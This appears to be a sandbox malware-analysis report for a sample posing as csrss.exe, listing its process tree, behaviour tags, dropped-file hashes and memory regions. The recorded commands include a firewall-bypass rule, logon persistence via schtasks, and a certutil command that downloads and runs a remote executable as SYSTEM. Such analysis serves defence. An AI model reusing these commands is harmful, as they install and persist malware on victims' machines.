C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 2204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 3364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 3364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 6644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 6644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 6644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 6644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 7484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 7604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 8844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 8124⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 7284⤵
- Program crash
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 7284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 10004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 8644⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 9964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 9404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 10644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 9644⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 15244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 15404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 15884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 16044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 14884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 16564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 6764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 16604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 16564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 16724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 8843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 9282⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2484 -ip 24841⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2484 -ip 24841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4012 -ip 40121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1336 -ip 13361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1336 -ip 13361⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
3.9MB
MD54f22f6d197f336b668b31e2470c2c857
SHA1c96ebad60609561a1fc8f6e8dc78612b39145110
SHA256e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88
SHA512616c93a8f0b254c624c53fbe1c1f984e79e5c71ecc05a52c8003410317411bb2d49fe8cfc0bb3680a3707ceaf65ddacf0a452334a32fa195b773f8deeb057970
-
C:\Windows\rss\csrss.exeFilesize
3.9MB
MD54f22f6d197f336b668b31e2470c2c857
SHA1c96ebad60609561a1fc8f6e8dc78612b39145110
SHA256e4148bfa1147a6062d657cae12b65df994f10328acb441045f9f3cd68dd81f88
SHA512616c93a8f0b254c624c53fbe1c1f984e79e5c71ecc05a52c8003410317411bb2d49fe8cfc0bb3680a3707ceaf65ddacf0a452334a32fa195b773f8deeb057970
-
memory/1172-148-0x0000000000000000-mapping.dmp
-
memory/1268-141-0x0000000000000000-mapping.dmp
-
memory/1336-147-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/1336-153-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/1336-142-0x0000000000000000-mapping.dmp
-
memory/1336-145-0x0000000001400000-0x00000000017A8000-memory.dmpFilesize
3.7MB
-
memory/2484-132-0x0000000001007000-0x00000000013AF000-memory.dmpFilesize
3.7MB
-
memory/2484-137-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/2484-133-0x00000000013B0000-0x0000000001BB4000-memory.dmpFilesize
8.0MB
-
memory/2484-135-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/2484-134-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/2700-140-0x0000000000000000-mapping.dmp
-
memory/3208-150-0x0000000000000000-mapping.dmp
-
memory/3492-152-0x0000000000000000-mapping.dmp
-
memory/4012-146-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/4012-138-0x0000000000F46000-0x00000000012EE000-memory.dmpFilesize
3.7MB
-
memory/4012-136-0x0000000000000000-mapping.dmp
-
memory/4012-139-0x0000000000400000-0x0000000000C1E000-memory.dmpFilesize
8.1MB
-
memory/4584-149-0x0000000000000000-mapping.dmp